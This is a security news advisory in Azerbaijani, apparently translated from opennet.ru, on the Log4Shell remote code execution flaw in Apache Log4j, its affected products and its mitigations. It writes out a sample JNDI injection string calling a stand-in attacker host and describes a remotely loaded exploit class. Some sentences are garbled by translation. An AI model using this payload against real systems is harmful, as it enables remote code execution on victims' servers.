Java proqramlarında girişin təşkili üçün məşhur çərçivə olan Apache Log4j-də jurnala “{jndi:URL}” formatında xüsusi formatlaşdırılmış dəyər yazıldıqda ixtiyari kodun icrasına imkan verən kritik zəiflik müəyyən edilmişdir. Hücum xarici mənbələrdən alınan dəyərləri qeyd edən Java proqramlarında, məsələn, səhv mesajlarında problemli dəyərləri göstərərkən həyata keçirilə bilər.
Qeyd olunur ki, Apache Struts, Apache Solr, Apache Druid və ya Apache Flink kimi çərçivələrdən istifadə edən demək olar ki, bütün layihələr, o cümlədən Steam, Apple iCloud, Minecraft müştəriləri və serverləri problemdən təsirlənir. Gözlənilir ki, zəiflik korporativ tətbiqlərə kütləvi hücumlar dalğasına səbəb ola bilər, Apache Struts çərçivəsindəki kritik zəifliklərin tarixini təkrarlaya bilər, kobud hesablamaya görə, Fortune-un 65%-i veb proqramlarda istifadə edir. 100 şirkət.Şəbəkəni həssas sistemlər üçün skan etmək cəhdləri də daxil olmaqla.
Problemi daha da gücləndirir ki, işləyən ekspluat artıq dərc olunub, lakin stabil filiallar üçün düzəlişlər hələ tərtib olunmayıb. CVE identifikatoru hələ təyin edilməyib. Düzəliş yalnız log4j-2.15.0-rc1 test bölməsinə daxil edilmişdir. Zəifliyin bloklanması üçün həll yolu kimi log4j2.formatMsgNoLookups parametrini doğru olaraq təyin etmək tövsiyə olunur.
Problem log4j-in JNDI (Java Adlandırma və Kataloq İnterfeysi) sorğularının yerinə yetirilə biləcəyi jurnala çıxış sətirlərində “{}” xüsusi maskaların işlənməsini dəstəkləməsi ilə əlaqədardır. Hücum “${jndi:ldap://attacker.com/a}” əvəzetməsi ilə sətirin ötürülməsi ilə nəticələnir, emal edildikdən sonra log4j Java sinfinə gedən yol üçün attacker.com serverinə LDAP sorğusu göndərəcək. . Təcavüzkarın serveri tərəfindən qaytarılan yol (məsələn, http://second-stage.attacker.com/Exploit.class) cari proses kontekstində yüklənəcək və icra ediləcək, bu da təcavüzkarın öz ixtiyari kodunu yerinə yetirməsinə imkan verir. cari tətbiqin hüquqları ilə sistem.
Əlavə 1: Zəifliyə CVE-2021-44228 identifikatoru təyin edilib.
Əlavə 2: log4j-2.15.0-rc1 buraxılışı ilə əlavə edilmiş mühafizədən yan keçməyin yolu müəyyən edilmişdir. Zəifliyə qarşı daha tam qorunma ilə yeni log4j-2.15.0-rc2 yeniləməsi təklif edilmişdir. Kod səhv formatlaşdırılmış JNDI URL-dən istifadə edildiyi halda anormal xitamın olmaması ilə bağlı dəyişikliyi vurğulayır.
Mənbə: opennet.ru